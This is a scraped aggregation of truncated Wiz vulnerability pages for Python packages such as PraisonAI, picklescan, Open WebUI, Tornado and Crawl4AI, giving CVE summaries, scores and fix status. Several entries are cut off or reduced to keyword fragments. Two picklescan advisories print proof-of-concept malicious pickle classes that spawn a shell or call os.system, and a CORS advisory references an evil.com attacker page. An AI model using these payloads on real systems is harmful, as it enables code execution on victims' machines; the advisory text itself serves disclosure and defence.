Skill Scanner is a security scanner for AI Agent Skills that detects prompt injection, data exfiltration, and malicious code patterns. A vulnerability in the API Server of Skill Scanner could allow a unauthenticated, remote attacker to interact with the server API and either trigger a denial of service (DoS) condition or upload arbitrary files. This vulnerability is due to an erroneous binding to multiple interfaces. An attacker could exploit this vulnerability by sending API requests to a device exposing the affected API Server. A successful exploit could allow the attacker to consume an excessive amount of resources (memory starvation) or to upload files to arbitrary folders on the affected device. This vulnerability affe
Wiz
CVE-2026-34938 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2026-34938 [CRITICAL] CVE-2026-34938 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34938 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 1.5.90, execute_code() in praisonai-agents runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a str subclass with an overridden startswith() method to the _safe_getattr wrapper, achieving arbitrary OS command execution on the host. This issue has been patched in version 1.5.90.
Source : NVD
## 10
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 10.0
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
praisonai
Wiz
CVE-2026-31899 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-31899 [HIGH] CVE-2026-31899 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31899 :
Python vulnerability analysis and mitigation
CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to Kozea/CairoSVG has exponential denial of service via recursive element amplification in cairosvg/defs.py. This causes CPU exhaustion from a small input.
Source : NVD
## 7.5
Score
Published March 13, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
cairosvg
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 14, 2026
Debian 14 Severity HIGH No Fix Added at: Mar 14, 2026
Echo Sev
Wiz
CVE-2026-28788 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-28788 [HIGH] CVE-2026-28788 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28788 :
Python vulnerability analysis and mitigation
POST /api/v1/retrieval/process/files/batch
GET /api/v1/knowledge/{id}/files
Source : NVD
## 7.1
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
Open WebUI
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:openwebui:open_webui
open-webui
Sources
pip Severity HIGH Has Fix Added at: Mar 29, 2026
Linux Severity HIGH Has Fix Added at: Mar 29, 2026
Windows Severity HIGH Has Fix Added at: Mar 29, 2026
Linux Severity HIGH Has Fix Added at: Apr 05, 2026
Windows Severity HIGH Has Fix Added at: Apr 05
Wiz
CVE-2026-32610 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32610 [HIGH] CVE-2026-32610 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32610 :
Python vulnerability analysis and mitigation
allow_origins=["*"]
allow_credentials=True
CORSMiddleware
Origin
Access-Control-Allow-Origin
*
Source : NVD
## 8.1
Score
Published March 18, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glances
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severity HIGH No Fix Added at: Mar 19, 2026
pip Severity HIGH Has Fix Added at: Mar 17, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 22, 2
Wiz
CVE-2026-28348 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-28348 [MEDIUM] CVE-2026-28348 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28348 :
Python vulnerability analysis and mitigation
lxml.html.clean
Source : NVD
## 6.1
Score
Published March 5, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python3-lxml-html-clean
python-lxml-html-clean
Sources
NVD
Alpine 3.21, 3.22 Severity MEDIUM No Fix Added at: Mar 10, 2026
Chainguard Has Fix Added at: Mar 10, 2026
Debian 13 Severity MEDIUM No Fix Added at: Mar 08, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 08, 2026
Echo Severity MEDIUM No Fix Added at: Mar 08, 2026
pip Severity MEDIUM Has Fix Ad
Wiz
CVE-2026-33992 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-33992 [CRITICAL] CVE-2026-33992 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33992 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, PyLoad's download engine accepts arbitrary URLs without validation, enabling Server-Side Request Forgery (SSRF) attacks. An authenticated attacker can exploit this to access internal network services and exfiltrate cloud provider metadata. On DigitalOcean droplets, this exposes sensitive infrastructure data including droplet ID, network configuration, region, authentication keys, and SSH keys configured in user-data/cloud-init. Version 0.5.0b3.dev97 contains a patch.
Source : NVD
## 9.3
Score
Published March 27, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV
Wiz
CVE-2026-27826 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-27826 [HIGH] CVE-2026-27826 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27826 :
Python vulnerability analysis and mitigation
Authorization
169[.]254[.]169[.]254
Source : NVD
## 8.2
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mcp-atlassian
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CV
Wiz
CVE-2026-27838 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.1
CVE-2026-27838 [LOW] CVE-2026-27838 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27838 :
Python vulnerability analysis and mitigation
self.get_object()
pk
Source : NVD
## 3.5
Score
Published February 26, 2026
Severity LOW
CNA Score 3.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wger
Sources
NVD
pip Severity LOW No Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9
Wiz
GHSA-g9rg-8vq5-mpwm Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-g9rg-8vq5-mpwm Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-g9rg-8vq5-mpwm :
Python vulnerability analysis and mitigation
## Summary
MCP_HTTP_ENABLED=true
allow_origins=['*']
allow_credentials=True
allow_methods=["*"]
allow_headers=["*"]
Access-Control-Allow-Origin: *
MCP_ALLOW_ANONYMOUS_ACCESS=true
## Details
## Vulnerable Code
config.py:546
CORS_ORIGINS = os.getenv('MCP_CORS_ORIGINS', '*').split(',')
['*']
app.py:274-280
# CORS middleware
app.add_middleware(
CORSMiddleware,
allow_origins=CORS_ORIGINS, # ['*'] by default
allow_credentials=True, # Unnecessary for anonymous access; bad practice
allow_methods=["*"],
allow_headers=["*"],
)
## How the Attack Works
Access-Control-Allow-Origin: *
// Running on https://evil.com - reads victim's memories
// No credentials needed - anonymous access means the API is open
cons
Wiz
CVE-2026-33430 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-33430 [HIGH] CVE-2026-33430 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33430 :
Python vulnerability analysis and mitigation
briefcase create
Source : NVD
## 7.3
Score
Published March 26, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
briefcase
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.
Wiz
CVE-2026-31826 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-31826 [MEDIUM] CVE-2026-31826 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31826 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to 6.8.0, an attacker who uses this vulnerability can craft a PDF which leads to large memory usage. This requires parsing a content stream with a rather large /Length value, regardless of the actual data length inside the stream. This vulnerability is fixed in 6.8.0.
Source : NVD
## 6.8
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
litellm
nemo
Sources
NVD
Chainguard Has Fix Added at:
Wiz
GHSA-vqmv-47xg-9wpr Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-vqmv-47xg-9wpr Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vqmv-47xg-9wpr :
Python vulnerability analysis and mitigation
## Summary
Using pty.spawn, which is a built-in python library function to execute arbitrary commands on the host system.
## Details
pty.spawn
__reduce__
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
The victim proceeds to load the pickle file and execute attacker-injected arbitrary code.
## PoC
class PtyExploit:
def __reduce__(self):
return (pty.spawn, (["/bin/sh", "-c", "id; exit"],))
## Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Wiz
CVE-2026-25904 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-25904 [MEDIUM] CVE-2026-25904 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25904 :
Python vulnerability analysis and mitigation
The Pydantic-AI MCP Run Python tool configures the Deno sandbox with an overly permissive configuration that allows the underlying Python code to access the localhost interface of the host to perform SSRF attacks. Note - the "mcp-run-python" project is archived and unlikely to receive a fix.
Source : NVD
## 5.8
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mcp-run-python
Sources
NVD
pip Severity MEDIUM No Fix Added at: Feb 12, 2026
## Get a CVE risk a
Wiz
CVE-2026-27735 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.4
CVE-2026-27735 [MEDIUM] CVE-2026-27735 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27735 :
Python vulnerability analysis and mitigation
../
Source : NVD
## 6.4
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 6.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mcp-server-git
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.
Wiz
GHSA-cffc-mxrf-mhh4 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-cffc-mxrf-mhh4 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-cffc-mxrf-mhh4 :
Python vulnerability analysis and mitigation
## Summary
Picklescan uses numpy.f2py.crackfortran.param_eval, which is a function in numpy to execute remote pickle files.
## Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling the numpy.f2py.crackfortran.param_eval function via reduce method.
Then, when the victim checks whether the pickle file is safe by using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution.
## PoC
class RCE:
def __reduce__(self):
from numpy.f2py.crackfortran import param_eval
return (param_eval,("os.system('ls')",None,None,None))
## Impact
Any
Wiz
CVE-2026-22798 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-22798 [MEDIUM] CVE-2026-22798 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22798 :
Python vulnerability analysis and mitigation
hermes is an implementation of the HERMES workflow to automatize software publication with rich metadata. From 0.8.1 to before 0.9.1, hermes subcommands take arbitrary options under the -O argument. These have been logged in raw form. If users provide sensitive data such as API tokens (e.g., via hermes deposit -O invenio_rdm.auth_token SECRET), these are written to the log file in plain text, making them available to whoever can access the log file. This vulnerability is fixed in 0.9.1.
Source : NVD
## 5
Score
Published January 12, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Pr
Wiz
CVE-2026-1777 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2026-1777 [HIGH] CVE-2026-1777 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1777 :
Python vulnerability analysis and mitigation
The Amazon SageMaker Python SDK before v3.2.0 and v2.256.0 includes the ModelBuilder HMAC signing key in the cleartext response elements of the DescribeTrainingJob function. A third party with permissions to both call this API and permissions to modify objects in the Training Jobs S3 output location may have the ability to upload arbitrary artifacts which are executed the next time the Training Job is invoked.
Source : NVD
## 8.5
Score
Published February 2, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.4
Exploitation Probability (EPSS) N/A
Affected package
Wiz
CVE-2025-68492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2025-68492 [LOW] CVE-2025-68492 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68492 :
Python vulnerability analysis and mitigation
Chainlit versions prior to 2.8.5 contain an authorization bypass through user-controlled key vulnerability. If this vulnerability is exploited, threads may be viewed or thread ownership may be obtained by an attacker who can log in to the product.
Source : NVD
## 2.3
Score
Published January 14, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
chainlit
Sources
NVD
pip Severity LOW Has Fix Added at: Jan 15, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud
Wiz
CVE-2026-2256 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-2256 [MEDIUM] CVE-2026-2256 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2256 :
Python vulnerability analysis and mitigation
A command injection vulnerability in ModelScope's ms-agent versions v1.6.0rc1 and earlier exists, allowing an attacker to execute arbitrary operating system commands through crafted prompt-derived input.
Source : NVD
## 6.5
Score
Published March 2, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 84.6
Exploitation Probability (EPSS) 2.3
Affected packages and libraries
ms-agent
Sources
NVD
pip Severity MEDIUM No Fix Added at: Mar 05, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, n
Wiz
CVE-2026-27483 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-27483 [HIGH] CVE-2026-27483 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27483 :
Python vulnerability analysis and mitigation
../
Source : NVD
## 8.8
Score
Published February 24, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 94.8
Exploitation Probability (EPSS) 16.3
Affected packages and libraries
mindsdb
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 25, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.2
Python
Wiz
CVE-2026-30244 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-30244 [HIGH] CVE-2026-30244 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30244 :
Python vulnerability analysis and mitigation
Plane is an an open-source project management tool. Prior to version 1.2.2, unauthenticated attackers can enumerate workspace members and extract sensitive information including email addresses, user roles, and internal identifiers. The vulnerability stems from Django REST Framework permission classes being incorrectly configured to allow anonymous access to protected endpoints. This issue has been patched in version 1.2.2.
Source : NVD
## 7.5
Score
Published March 6, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.8
Exploitation Probability (EPSS) N/A
Affe
Wiz
CVE-2026-33980 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-33980 [HIGH] CVE-2026-33980 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33980 :
Python vulnerability analysis and mitigation
get_table_schema
sample_table_data
get_table_details
table_name
Source : NVD
## 8.3
Score
Published March 27, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
adx-mcp-server
Sources
NVD
pip Severity HIGH No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Wiz
CVE-2026-31958 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-31958 [HIGH] CVE-2026-31958 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31958 :
Python vulnerability analysis and mitigation
Tornado is a Python web framework and asynchronous networking library. In versions of Tornado prior to 6.5.5, the only limit on the number of parts in multipart/form-data is the max_body_size setting (default 100MB). Since parsing occurs synchronously on the main thread, this creates the possibility of denial-of-service due to the cost of parsing very large multipart bodies with many parts. This vulnerability is fixed in 6.5.5.
Source : NVD
## 8.7
Score
Published March 11, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.4
Exploitation Probability (EPS
Wiz
CVE-2026-0897 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-0897 [HIGH] CVE-2026-0897 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0897 :
Python vulnerability analysis and mitigation
Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape.
Source : NVD
## 7.1
Score
Published January 15, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
CBL Mariner
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and librari
Wiz
CVE-2025-13780 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2025-13780 [CRITICAL] CVE-2025-13780 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-13780 :
Python vulnerability analysis and mitigation
pgAdmin versions up to 9.10 are affected by a Remote Code Execution (RCE) vulnerability that occurs when running in server mode and performing restores from PLAIN-format dump files. This issue allows attackers to inject and execute arbitrary commands on the server hosting pgAdmin, posing a critical risk to the integrity and security of the database management system and underlying data.
Source : NVD
## 8.8
Score
Published December 11, 2025
Severity HIGH
CNA Score 9.1
Affected Technologies
Python
pgAdmin
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 37.8
Exploitation Probability (EPSS) 0.2
Affected packages and libra
Wiz
CVE-2026-22607 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-22607 [HIGH] CVE-2026-22607 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22607 :
Python vulnerability analysis and mitigation
Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python's cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7.
Source : NVD
## 8.9
Score
Published January 10, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
Has Public
Wiz
CVE-2026-35615 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-35615 [CRITICAL] CVE-2026-35615 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35615 :
Python vulnerability analysis and mitigation
## Executive Summary:
..
normpath()
..
## Details:
_validate_path()
os.path.normpath()
..
'..'
..
src/praisonai-agents/praisonaiagents/tools/file_tools.py
class FileTools:
"""Tools for file operations including read, write, list, and information."""
@staticmethod
def _validate_path(filepath: str) -> str:
# Normalize the path
normalized = os.path.normpath(filepath)
absolute = os.path.abspath(normalized)
# Check for path traversal attempts (.. after normalization)
# We check the original input for '..' to catch traversal attempts
if '..' in normalized:
raise ValueError(f"Path traversal detected: {filepath}")
return absolute
Severity: CRITICAL CVSS v3.1: 9.2 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/S
Wiz
CVE-2026-33230 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-33230 [MEDIUM] CVE-2026-33230 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33230 :
Python vulnerability analysis and mitigation
nltk.app.wordnet_app
lookup_...
lookup_
word
Source : NVD
## 6.1
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nltk
open-webui
Sources
NVD
Chainguard Has Fix Added at: Mar 26, 2026
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 21, 2026
Echo Severity MEDIUM No Fix Added at: Mar 21, 2026
pip Severity MEDIUM Has Fix Added at: Mar 19, 2026
Wolfi Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized vie
Wiz
CVE-2026-35536 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-35536 [HIGH] CVE-2026-35536 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35536 :
Python vulnerability analysis and mitigation
In Tornado before 6.5.5, cookie attribute injection could occur because the domain, path, and samesite arguments to .RequestHandler.set_cookie were not checked for crafted characters.
Source : NVD
## 7.2
Score
Published April 3, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Python
MinimOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python-tornado
tornado
Sources
NVD
Debian 11, 14 Severity HIGH Has Fix Added at: Apr 03, 2026
Debian 12, 13 Severity HIGH No Fix Added at: Apr 03, 2026
Echo Severity HIGH No Fix Added at: Apr 05, 202
Wiz
CVE-2026-26217 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-26217 [CRITICAL] CVE-2026-26217 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26217 :
Python vulnerability analysis and mitigation
Crawl4AI versions prior to 0.8.0 contain a local file inclusion vulnerability in the Docker API deployment. The /execute_js, /screenshot, /pdf, and /html endpoints accept file:// URLs, allowing unauthenticated remote attackers to read arbitrary files from the server filesystem. An attacker can access sensitive files such as /etc/passwd, /etc/shadow, application configuration files, and environment variables via /proc/self/environ, potentially exposing credentials, API keys, and internal application structure.
Source : NVD
## 9.2
Score
Published February 12, 2026
Severity CRITICAL
CNA Score 9.2
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date
Wiz
CVE-2025-15346 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2025-15346 [CRITICAL] CVE-2025-15346 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15346 :
Python vulnerability analysis and mitigation
A vulnerability in the handling of verify_mode = CERT_REQUIRED in the wolfssl Python package (wolfssl-py) causes client certificate requirements to not be fully enforced.
Because the WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT flag was not included, the behavior effectively matched CERT_OPTIONAL: a peer certificate was verified if presented, but connections were incorrectly authenticated when no client certificate was provided.
This results in improper authentication, allowing attackers to bypass mutual TLS (mTLS) client authentication by omitting a client certificate during the TLS handshake.
The issue affects versions up to and including 5.8.2.
Source : NVD
## 9.3
Score
Published January 8, 2026
Severity CRITICAL
CNA S
Wiz
CVE-2026-27025 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27025 [MEDIUM] CVE-2026-27025 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27025 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to 6.7.1, an attacker who uses this vulnerability can craft a PDF which leads to long runtimes and large memory consumption. This requires parsing the /ToUnicode entry of a font with unusually large values, for example during text extraction. This vulnerability is fixed in 6.7.1.
Source : NVD
## 6.9
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python313-PyPDF2
pypdf
Sources
NVD
Cha
Wiz
CVE-2026-28413 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-28413 [MEDIUM] CVE-2026-28413 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28413 :
Python vulnerability analysis and mitigation
